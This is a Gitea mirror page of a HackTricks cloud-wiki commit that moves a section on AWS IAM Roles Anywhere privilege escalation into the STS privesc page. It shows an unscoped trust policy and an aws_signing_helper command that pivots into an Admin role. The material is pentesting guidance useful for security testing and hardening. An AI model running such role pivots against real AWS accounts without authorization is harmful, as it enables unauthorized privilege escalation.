gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-08 03:10:49 -08:00
Code Issues Packages Projects Releases Wiki Activity

UPDATE

Browse Source
This commit is contained in:
carlospolop
2025-06-24 15:59:59 +02:00
parent ba62c1ded8
commit 278e22cf25
2 changed files with 44 additions and 50 deletions
Download Patch File Download Diff File Expand all files Collapse all files

50
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md
View File

@@ -1,50 +0,0 @@
# AWS - IAM Roles Anywhere Privesc
{{#include ../../../../banners/hacktricks-training.md}}
AWS IAM RolesAnywhere allows workloads outside AWS to assume IAM roles using X.509 certificates. But when trust policies aren't properly scoped, they can be abused for privilege escalation.
This policy lacks restrictions on which trust anchor or certificate attributes are allowed. As a result, any certificate tied to any trust anchor in the account can be used to assume this role.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "rolesanywhere.amazonaws.com"
},
"Action": [
"sts:AssumeRole",
"sts:SetSourceIdentity",
"sts:TagSession"
]
}
]
}
```
To privesc, the `aws_signing_helper` is required from https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
Then using a valid certificate the attacker can pivot into the higher privilege role
```bash
aws_signing_helper credential-process \
--certificate readonly.pem \
--private-key readonly.key \
--trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
--profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
--role-arn arn:aws:iam::123456789012:role/Admin
```
### References
- https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation/
{{#include ../../../../banners/hacktricks-training.md}}

44
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md
View File

@@ -119,6 +119,50 @@ aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/
../aws-basic-information/aws-federation-abuse.md ../aws-basic-information/aws-federation-abuse.md
{{#endref}} {{#endref}}
### IAM Roles Anywhere Privesc
AWS IAM RolesAnywhere allows workloads outside AWS to assume IAM roles using X.509 certificates. But when trust policies aren't properly scoped, they can be abused for privilege escalation.
This policy lacks restrictions on which trust anchor or certificate attributes are allowed. As a result, any certificate tied to any trust anchor in the account can be used to assume this role.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "rolesanywhere.amazonaws.com"
},
"Action": [
"sts:AssumeRole",
"sts:SetSourceIdentity",
"sts:TagSession"
]
}
]
}
```
To privesc, the `aws_signing_helper` is required from https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
Then using a valid certificate the attacker can pivot into the higher privilege role
```bash
aws_signing_helper credential-process \
--certificate readonly.pem \
--private-key readonly.key \
--trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
--profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
--role-arn arn:aws:iam::123456789012:role/Admin
```
### References
- [https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation](https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation)
{{#include ../../../banners/hacktricks-training.md}} {{#include ../../../banners/hacktricks-training.md}}